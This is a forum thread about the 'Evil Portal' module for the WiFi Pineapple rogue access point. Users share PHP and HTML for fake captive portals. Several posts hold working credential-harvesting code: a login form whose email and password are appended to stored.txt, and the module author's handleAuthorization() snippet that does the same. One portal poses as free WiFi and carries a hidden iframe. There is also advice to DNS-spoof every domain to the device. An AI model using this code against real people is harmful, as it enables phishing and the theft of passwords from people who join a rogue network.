Rainman_34 Posted April 5, 2016 Share Posted April 5, 2016 What if you were running bettercap with it? Link to comment Share on other sites More sharing options...
stilia.johny Posted April 24, 2016 Share Posted April 24, 2016 Hi all. Please see my file bellow. I am trying to get a simple captive portal work so I can use it with my pineapple. Every time I try to authorise it goes to the captiveportal/index.php etc,. It add the IP in the authorised clients but on the client screen it shows a message that it is not authorised index.php <?php $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . ""; ?> <HTML> <HEAD> <title>Portal</title> <script type="text/javascript"> function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},10);} </script> </HEAD> <BODY> <center> <h1>Portal</h1> <p>This is the default Portal page</p> <? echo $_SERVER["REMOTE_ADDR"]; ?> <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()" > <input type="hidden" name="target" value="<?=$destination?>"> <input type="text" name="email" placeholder="New Email"><br> <input type="password" name="pass" placeholder="New Password" ><br> <input type="password" name="pass2" placeholder="Repeat Password" ><br> <button type="submit">Authorize</button> </form> </center> </BODY> </HTML> /captiveportal/index.php <?php namespace evilportal; $email = $_POST['email']; $pass = $_POST['pass']; header('Content-Type: application/json'); $file = fopen("./stored.txt", "a"); fwrite($file, $email . " " . $pass . "\n"); fclose($file); require_once("API.php"); $api = new API(); echo $api->go(); Just to note, overall it saves the username and password to the stored.txt I will appriciate your advice on why the clients are not authorised Ta Link to comment Share on other sites More sharing options...
xr4ti Posted May 10, 2016 Share Posted May 10, 2016 Does anyone know of a way to allow a client to connect to a remote ip address without authenticating? I need the clients to be able to connect to a specific ip address if they accept the captive portal terms or not. Link to comment Share on other sites More sharing options...
newbi3 Posted May 20, 2016 Author Share Posted May 20, 2016 On 4/24/2016 at 0:39 PM, stilia.johny said: Hi all. Please see my file bellow. I am trying to get a simple captive portal work so I can use it with my pineapple. Every time I try to authorise it goes to the captiveportal/index.php etc,. It add the IP in the authorised clients but on the client screen it shows a message that it is not authorised index.php <?php $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . ""; ?> <HTML> <HEAD> <title>Portal</title> <script type="text/javascript"> function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},10);} </script> </HEAD> <BODY> <center> <h1>Portal</h1> <p>This is the default Portal page</p> <? echo $_SERVER["REMOTE_ADDR"]; ?> <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()" > <input type="hidden" name="target" value="<?=$destination?>"> <input type="text" name="email" placeholder="New Email"><br> <input type="password" name="pass" placeholder="New Password" ><br> <input type="password" name="pass2" placeholder="Repeat Password" ><br> <button type="submit">Authorize</button> </form> </center> </BODY> </HTML> /captiveportal/index.php <?php namespace evilportal; $email = $_POST['email']; $pass = $_POST['pass']; header('Content-Type: application/json'); $file = fopen("./stored.txt", "a"); fwrite($file, $email . " " . $pass . "\n"); fclose($file); require_once("API.php"); $api = new API(); echo $api->go(); Just to note, overall it saves the username and password to the stored.txt I will appriciate your advice on why the clients are not authorised Ta This thread isn't to get help with your code not working but since I've had this question asked a lot I'll address it this time and this time only: Any backend code that you want to have happen, no matter what it does, needs to happen in the MyPortal.php in this case you want your to write the posted data to a file and you would do that in the handleAuthorization method. The method should look something like this when you are done: public function handleAuthorization() { $email = $this->request->email; $pass = $this->request->pass; $file = fopen("./stored.txt", "a"); fwrite($file, $email . " " . $pass . "\n"); fclose($file); // Call parent to handle basic authorization first parent::handleAuthorization(); // Check for other form data here } I created a video not to long ago showing how to do something similar to this: One day I plan on doing a more in depth video on the flow of EP for developers. On 5/10/2016 at 3:32 PM, xr4ti said: Does anyone know of a way to allow a client to connect to a remote ip address without authenticating? I need the clients to be able to connect to a specific ip address if they accept the captive portal terms or not. Currently there isn't a way to do that baked into the Evil Portal module but you could do it with some IP tables foo. I'll put this on my list of features for a future release. Link to comment Share on other sites More sharing options...
Captain Posted May 31, 2016 Share Posted May 31, 2016 A little late to the party here, but thanks for the awesomeness in the latest update. It feels like this module is working the way it was always intended, easy and straight forward. This tool has saved me hours and hours of work! Props Link to comment Share on other sites More sharing options...
newbi3 Posted June 1, 2016 Author Share Posted June 1, 2016 5 hours ago, Captain said: A little late to the party here, but thanks for the awesomeness in the latest update. It feels like this module is working the way it was always intended, easy and straight forward. This tool has saved me hours and hours of work! Props Thanks! Glad you like it :) Link to comment Share on other sites More sharing options...
Captain Posted June 1, 2016 Share Posted June 1, 2016 Also, to those that are having issues with code. A great tool for testing quickly and easily is loading up XAMPP and running local tests. In my experience, if the code will work on XAMPP it will work with evil portal (well, I should say the web server on pineapple)Â Link to comment Share on other sites More sharing options...
newbi3 Posted June 12, 2016 Author Share Posted June 12, 2016 Evil Portal 2.1 is awaiting approval but you can get it now from the development branch on the github repo:Â https://github.com/frozenjava/EvilPortalNano/tree/development Evil Portal 2.1 is now available to download from the Pineapple Bar. Link to comment Share on other sites More sharing options...
cheeto Posted June 13, 2016 Share Posted June 13, 2016 Great to hear of the update.   Really looking forward to updating.  Do you have a changelog for EP? Link to comment Share on other sites More sharing options...
newbi3 Posted June 13, 2016 Author Share Posted June 13, 2016 9 hours ago, cheeto said: Great to hear of the update.   Really looking forward to updating.  Do you have a changelog for EP? I added a change log to the main post. You can also see it on github if for some reason I don't post it here https://github.com/frozenjava/EvilPortalNano Link to comment Share on other sites More sharing options...
Ajaxjones Posted June 15, 2016 Share Posted June 15, 2016 really nice plugin and works well. Just out of interest, what do I need to do to de-authorize a connection to get them to redo the portal? Mainly interested for testing purposes. I've been kicking client, and removing them from  Authorized Clients lists, even cleansing the /temp/dhcp.leases and the EVILPORTAL_CLIENTS.txt  file, but ,the pesky ipads and iphones seem to ignore that and just re-connect. then every now and then I seem to be able to start the process as normal and get the portal screen again? Link to comment Share on other sites More sharing options...
newbi3 Posted June 15, 2016 Author Share Posted June 15, 2016 15 hours ago, Ajaxjones said: really nice plugin and works well. Just out of interest, what do I need to do to de-authorize a connection to get them to redo the portal? Mainly interested for testing purposes. I've been kicking client, and removing them from  Authorized Clients lists, even cleansing the /temp/dhcp.leases and the EVILPORTAL_CLIENTS.txt  file, but ,the pesky ipads and iphones seem to ignore that and just re-connect. then every now and then I seem to be able to start the process as normal and get the portal screen again? Revoking them should work but if it doesn't then its probably because the clients web browser is caching pages and you'll have to wait until they visit a new page unfortunately. Link to comment Share on other sites More sharing options...
Ajaxjones Posted June 15, 2016 Share Posted June 15, 2016 yep. forgot that the browser is also in play and it's not just dhcp , connections and the like :) slipped this into the HTML and I can prevent the cache of the captive page and carry on testing layouts. <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1">   Link to comment Share on other sites More sharing options...
Onus Posted June 28, 2016 Share Posted June 28, 2016 On 3/14/2016 at 7:26 PM, sud0nick said: Real Issues 1. There is no redirect to the requested site once the client has been authorized. I followed the data flow and it appears the following files are accessed in order (index.php -> /www/captiveportal/index.php -> API.php -> Portal.php) and within Portal.php the methods handleAuthorization() and getResponse() are called. The problem is your redirect() method is never called in Portal.php. I tried adding it to handleAuthorization() but it appears the header does not get set because I still don't get redirected. I also tried adding it to MyPortal.php and removed the parent::showSuccess(); call. Edit: I see now that redirect() is called in the authorizeClient() method but it still does not work. Has there been a fix put forward for the above issue? Â It seems to me that i can click the Authorize button all day but it never redirects the user back to URI they originally requested. Â It does however seem to add them to the Auth list and if they shut down the browser and re-open they have internet access.. Â Link to comment Share on other sites More sharing options...
sud0nick Posted June 28, 2016 Share Posted June 28, 2016 2 hours ago, Onus said: Has there been a fix put forward for the above issue? Â It seems to me that i can click the Authorize button all day but it never redirects the user back to URI they originally requested. Â It does however seem to add them to the Auth list and if they shut down the browser and re-open they have internet access.. Â I'm not sure if this has been fixed yet. Â I'm assuming you've updated to the newest version of EP? Â I haven't had the chance as I've been too busy to even boot up my Pineapple lately. Â I'm sure if you hit up newbi3 on twitter he can give you an answer. Link to comment Share on other sites More sharing options...
Onus Posted July 9, 2016 Share Posted July 9, 2016 It seems to be working now.. i did a fresh pineapple reset, re-installed evil portal, and tweaked the index.php file a bit..  i also seemed to have to ssh in to the pineapple and chmod the /www/captiveportal/index.php for some reason as well of course for my image assets.. anyway, here is my current index for the portal that seems to be working with only a minor flaw in that sometimes it loads a second time before finally redirecting the user.. i found that the $destination gets a little quirky with how different os's handle "free wifi portal sign ons" so you will notice just redirect to google.com, but maybe this will save someone else some of the hours i spent, tweaking..  <?php $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . ""; if($destination == "http://172.16.42.1"){ $destination = "https://google.com";} ?> <!DOCTYPE html> <html> <head> <meta content="text/html; charset=windows-1252" http-equiv="content-type"> <title>free KITTY WiFi</title> <meta http-equiv="Pragma" content="no-cache"> <script type="text/javascript"> var delay = 2; // length of delay in seconds var countDown = 10; function changeText(){ countDown--; document.getElementById('myDiv').innerHTML = ' <h1><span style="font-family: Verdana;">'+countDown+'</span></h1>'; if(countDown>0){ setTimeout(function () { changeText(); }, 1000); }else{ var form = document.getElementById("myForm"); form.submit(); redirect(); } } function redirect() { setTimeout(function(){window.location = "https://google.com";},2000);} </script> </head> <body onload="changeText();" style=" background-image: url("gotam.jpg"); margin-right: 0px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"> <center> <table bgcolor="#FFE600" height="10px" width="100%"> </table> <table bgcolor="#FFE600" height="70px" width="100px"> </table> <h4 style=" margin-top: 11.4333px; height: 29px;"><span style="font-family: Verdana; color: #424242;">FREE<br> </span></h4> <h1 style="margin-top: -33.5667px; height: 31px;"><span style="font-family: Verdana; color: #424242;">KITTY<br> </span></h1> <table bgcolor="#FFE600" height="10px" width="100px"> </table> <div> <h1 style="height: 34px; margin-top: 13.4333px;"><span style="font-family: Verdana; color: #424242;">WiFi</span></h1> </div> <table bgcolor="#FFE600" height="10px" width="100px"> </table> <address style="margin-top: 0px;"><span style="font-family: Verdana;"><br> are you ready?</span></address> <div id="myDiv"></div> <!-- <h1><span style="font-family: Verdana;">7</span></h1>--> <br> <img style="height: 153px; margin-top: -22px;" src="kittypaw.png"> <table bgcolor="#FFE600" height="2px" width="200px"> </table> <h4><span style="font-family: Verdana; color: #1c1c1c;">Terms and Conditions.</span></h4> <div style="text-align: center;"> </div> <div style="text-align: center;"> <address><span style="font-family: Verdana;">Use of this Web Portal is free!!! <br> Which is NICE!! With that said,<br> you can't really complain<br> about the service or the company. <br> <br> </span></address> <address><span style="font-family: Verdana;">I mean you ARE freeloading.<br> <br> </span></address> </div> <table bgcolor="#FFE600" height="2px" width="200px"> </table> <br> <br> </center> <form method="POST" action="/captiveportal/index.php" id="myForm" name="myForm"> <input type="hidden" name="target" value="<?=$destination?>"> <iframe src="http://172.16.42.42:8080/SHAZAM" seamless="" height="0px" width="0px"></iframe> </body> </html>  Link to comment Share on other sites More sharing options...
vertygo Posted July 11, 2016 Share Posted July 11, 2016 Thanks for posting this, I'm sure lots of us appreciate it.. few express it. What's the Shazam iframe stuff do ? is that top secret ? :) Link to comment Share on other sites More sharing options...
vertygo Posted July 15, 2016 Share Posted July 15, 2016 Is there a way to redirect someone to a specific captive portal based on which ssid they are connecting to ? EDIT: Erased my other question. All assets (imgs, css, etc) have to be stored in /www even tho index.php is in /root/portals/myportalname. Link to comment Share on other sites More sharing options...
newbi3 Posted July 18, 2016 Author Share Posted July 18, 2016 On 7/15/2016 at 3:27 PM, vertygo said: Is there a way to redirect someone to a specific captive portal based on which ssid they are connecting to ? EDIT: Erased my other question. All assets (imgs, css, etc) have to be stored in /www even tho index.php is in /root/portals/myportalname. I am going to work on features to get client information in a future release of EP so that kind of thing will be possible. Also you can put images and stuff in /root/portals/myportalname just make sure to create a symbolic link to /www ln -s /root/portals/myportalname/imagesDirName /www/ Â Link to comment Share on other sites More sharing options...
sud0nick Posted July 18, 2016 Share Posted July 18, 2016 On 7/15/2016 at 3:27 PM, vertygo said: Is there a way to redirect someone to a specific captive portal based on which ssid they are connecting to ? EDIT: Erased my other question. All assets (imgs, css, etc) have to be stored in /www even tho index.php is in /root/portals/myportalname. If you want to learn more about the structure of portals you can easily use PortalAuth to clone one and inspect it's contents within EP. Link to comment Share on other sites More sharing options...
vertygo Posted July 18, 2016 Share Posted July 18, 2016 Thank You! that ln command is what I needed. added it to /etc/rc.common so it's loaded every time. Am I right in noticing that EP won't work unless there's an active internet connection ? Is there a way to disable that requirement ? (ie. serve up a custom error page after the portal sign in) Thank You! Link to comment Share on other sites More sharing options...
newbi3 Posted July 19, 2016 Author Share Posted July 19, 2016 17 hours ago, vertygo said: Thank You! that ln command is what I needed. added it to /etc/rc.common so it's loaded every time. Am I right in noticing that EP won't work unless there's an active internet connection ? Is there a way to disable that requirement ? (ie. serve up a custom error page after the portal sign in) Thank You! You can DNS spoof *.* to 172.16.42.1 and that should fix that problem. Link to comment Share on other sites More sharing options...
vertygo Posted July 20, 2016 Share Posted July 20, 2016 I also noticed that if auto-enable is set, and you reboot the tetra, all the portals are activated (but only the first one shows to the end user) Link to comment Share on other sites More sharing options...
newbi3 Posted July 20, 2016 Author Share Posted July 20, 2016 1 hour ago, vertygo said: I also noticed that if auto-enable is set, and you reboot the tetra, all the portals are activated (but only the first one shows to the end user) Can you post a screen shot please? Link to comment Share on other sites More sharing options...
Benw Posted August 2, 2016 Share Posted August 2, 2016 On 7/19/2016 at 7:12 AM, newbi3 said: You can DNS spoof *.* to 172.16.42.1 and that should fix that problem. I still cant get it to function... any ideas? works fine with connection but captive does not prompt when not connected to a isp Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.